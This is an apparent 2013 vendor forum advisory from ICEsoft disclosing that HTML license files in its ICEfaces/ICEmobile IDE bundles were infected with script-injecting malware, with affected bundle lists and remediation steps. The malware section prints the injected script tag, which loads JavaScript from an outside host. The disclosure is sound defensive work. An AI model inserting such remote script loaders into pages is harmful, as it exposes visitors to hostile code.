voyent
Possible Malware Exposure via IDE Integration Bundles  XML
Forum Index -> News & Announcements
Author Message
ken.fyten

Joined: 26/Oct/2004 00:00:00
Messages: 1341
Offline


It was recently discovered that certain license and documentation HTML files included in our IDE integration bundles have been corrupted with a Trojan.Malscript!html malware. This malware adds JavaScript to the pages in question that executes when the page is loaded in the browser. The malware JavaScript seems to dynamically load JavaScript from a site which then attempts to open a Chinese shopping website in a popup window. Note that if your browser settings have popup windows disabled (the default setting is newer browsers), you may never see this popup at all.

The current version of this JavaScript file appears to be innocuous other than the SPAM-like nature of the popup window, so no user systems should be affected/infected by simply viewing the corrupted HTML files. However, to reduce the possibility of any negative impacts from this exposure, ICEsoft recommends scanning your system using the Norton/Symantec family of malware detection tools. Note that other similar products have not successfully detected this specific malware in our testing (AVS, Microsoft Security Essentials).

All the affected IDE bundles have been temporarily removed from the www.icesoft.org download site to prevent any further propagation of the malware-infected files. These will be updated to remove the corrupted HTML files and re-posted to the download site as they become available, starting with the most recent product releases.


Who is impacted?

All users of the ICEfaces/ICEmobile IDE Eclipse-family integration bundles for releases occurring after November 1st, 2012. This includes Eclipse, MyEclipse, and IBM RAD IDE tool bundle releases starting with and including the ICEfaces 3.2 open-source release on Nov. 2, 2012. Note that the ICEmobile 1.2, 1.3, and EE variants, and the ICEfaces EE 1.8.2.GA_P06 and P07 releases are also affected as they are provided in the same IDE bundles as the ICEfaces 3.x releases.

IDE integration bundles released prior to Nov. 2, 2012 are not affected, nor are the NetBeans integration bundles.

The full list of affected IDE bundles is provided below:

ICEfaces 3.2 / ICEmobile 1.2

  • ICEfaces-3.2.0b-Eclipse-4.2-Plugins.zip
  • ICEfaces-3.2.0–Eclipse-3.8-4.2-plugins.zip
  • IF-3.2.0-IM-1.2.0-Eclipse-3.8-4.2-Plugins.zip

ICEfaces 3.3 / ICEmobile 1.2 & 1.3

  • IF-3.3.0-IM-1.3.0-Eclipse-4.2-plugins.zip
  • IF-3.3.0a-IM-1.2.0-Eclipse-4.2-plugins.zip
  • IF-3.3.0–IM-1.2.0-Eclipse-4.2-plugins.zip

ICEfaces EE 3.0.0.GA_P01 / EE 1.8.2.GA_P04 & P05 / ICEmobile EE 1.0.0.GA_P01

  • IF-EE-3.0.0.P01-1.8.2.P05-IM-EE-1.0.0.P01-Eclipse-3.7-4.2-plugins.zip
  • IF-EE-3.0.0.P01-1.8.2.P05-IM-EE-1.0.0.P01-MyEclipse-10-plugins.zip
  • IF-IM-EE-3.0.0.GA_P01-RAD-8-plugins.zip
  • IF-EE-3.0.0.P01-1.8.2.P05-IM-EE-1.0.0.P01-RAD-8-Plugins.zip

ICEfaces EE 3.2.0.GA / EE 1.8.2.GA_P05 & P06 / ICEmobile EE 1.2.0.GA

  • IF-EE-3.2.0-1.8.2.P06-IM-EE-1.2.0-Eclipse-4.2-plugins.zip
  • IF-EE-3.2.0-1.8.2.P06-IM-EE-1.2.0-MyEclipse-10-plugins.zip
  • IF-EE-3.2.0-1.8.2_P05-IM-EE-1.2.0-Eclipse-4.2-plugins.zip
  • IF-EE-3.2.0-1.8.2.P05-IM-EE-1.2.0-MyEclipse-10-plugins.zip

ICEfaces EE 3.3.0.GA / EE 1.8.2.GA_P06 & P07 / ICEmobile EE 1.3.0.GA

  • IF-EE-3.3.0-1.8.2.P07-IM-EE-1.3.0-Eclipse-4.3-plugins.zip
  • IF-EE-3.3.0-1.8.2.P07-IM-EE-1.3.0-MyEclipse-2013-plugins.zip
  • IF-EE-3.3.0-1.8.2.P06-IM-EE-1.3.0-Eclipse-4.2-plugins.zip
  • IF-EE-3.3.0-1.8.2.P06-IM-EE-1.3.0-MyEclipse-2013-plugins.zip


What is the nature of the malware?

The malware itself consists of the following two elements being added to the HTML page:
Code:
 <HEAD>
 ...
 <script language="javascript" type="text/javascript" src="http://js.i8844.cn/js/user.js"></script>
 </HEAD>

  • This loads "user.js" from a site in China. This JS dynamically opens the shopping site in a new window (which is created by the img tag below).
    Code:
     <BODY>
     ...
     <img src="http://www.baidu.com/search/img/logo.gif"    />
     </body>

  • This opens the new window that the user.js script uses to redirect to the shopping website.

    Which files inside the bundles are affected?

    The specific files that are affected in each IDE bundle are noted below:

    • Eclipse

      • org.icefaces.eclipse.jst.pagedesigner_xxx/license.html
      • /org.icefaces.eclipse.jst.core_xxx/about.html
      • org.icefaces.eclipse.jst.doc_xxx/license.html
      • /features/org.icefaces.eclipse.jst.feature_xxx/license_community.html
      • /features/org.icefaces.eclipse.jst.pagedesigner.feature_xxx/license_community.html

    • MyEclipse

      • /org.icefaces.eclipse.jst.pagedesigner/license.html

    • RAD

      • (Only affects the IF-EE-3.0.0.P01-1.8.2.P05-IM-EE-1.0.0.P01-RAD-8-Plugins bundle)
      • /plugins/org.icemobile.rad.jst.core_1.0.1.201212111051/about.html
      • /plugins/org.icefaces.rad.visualizer_3.0.3.201212111051/license.html
      • plugins/org.icemobile.rad.jst.core_1.0.1.201212111051/about.html
      • /plugins/org.icefaces.rad.jst.doc_3.0.3.201212111051/license.html
      • /features/org.icefaces.rad.jst.feature_3.0.3.201212111051/license_community.html


    How did this occur?

    This malware was evidently introduced into our source-code repository via an infected developer workstation in late 2012. The infected workstation would modify static HTML pages on the system to add the malware JavaScript elements. Unfortunately, the ICEsoft product release testing process did not detect this issue previously.


    What are the next steps?

    All the affected IDE bundles have been temporarily removed from the www.icesoft.org download site to prevent any further propagation of the malware-infected files. These will be updated to remove the corrupted HTML files and re-posted to the download site as they become available, starting with the most recent product releases and working backwards.

    To reduce the possibility of any negative impacts from this exposure, ICEsoft recommends scanning your system using the Norton/Symantec family of malware detection tools. Note that other similar products have not successfully detected this specific malware in our testing (AVS, Microsoft Security Essentials).

    Finally, the ICEsoft product release process will be improved to add a more robust malware detection procedure to try to prevent any similar incidents from occurring in the future.

    We apologize for the inconvenience this issue may cause and appreciate your patience while we work to rectify this issue.

    [Edited on 8/4/2013 to add more bundle entries]

  • Ken Fyten
    VP Product Development
    ICEsoft Technologies, Inc.
    ken.fyten

    Joined: 26/Oct/2004 00:00:00
    Messages: 1341
    Offline


    The process to clean and rebuild the affected bundles above has been completed.

    Note that the updated bundles have a "...-A.zip" suffix on the file-name and a recent posting date to indicate they are the "cleaned" versions and safe to download and use. Of course, the original infected bundles have been permanently removed from download.

    In addition, new release procedures have been put in place that should prevent this sort of incident from re-occurring in the future.

    We once again would like to apologize for any inconvenience this issue may have caused.

    Regards,
    Ken




    Ken Fyten
    VP Product Development
    ICEsoft Technologies, Inc.
    ken.fyten

    Joined: 26/Oct/2004 00:00:00
    Messages: 1341
    Offline


    Edited the original list of affected bundles to remove the following entries, which were never affected and were erroneously included in the original listing:

    * ICEfaces-EE-3.0.0.GA_P01-1.8.2.GA_P04-Eclipse-3.7-4.2-plugins.zip

    * ICEfaces-EE-3.0.0.GA_P01-1.8.2.GA_P04-MyEclipse-10-plugins.zip

    * IF-EE-3.0.0.GA_P01-IM-EE-1.0.0.GA_P01-Eclipse-3.7-4.2-plugins.zip

    * IF-IM-EE-3.0.0.GA_P01-1.0.0.GA_P01-MyEclipse-10-plugins.zip


    Ken Fyten
    VP Product Development
    ICEsoft Technologies, Inc.
     
    Forum Index -> News & Announcements
    Go to:   
    Powered by JForum 2.1.7ice © JForum Team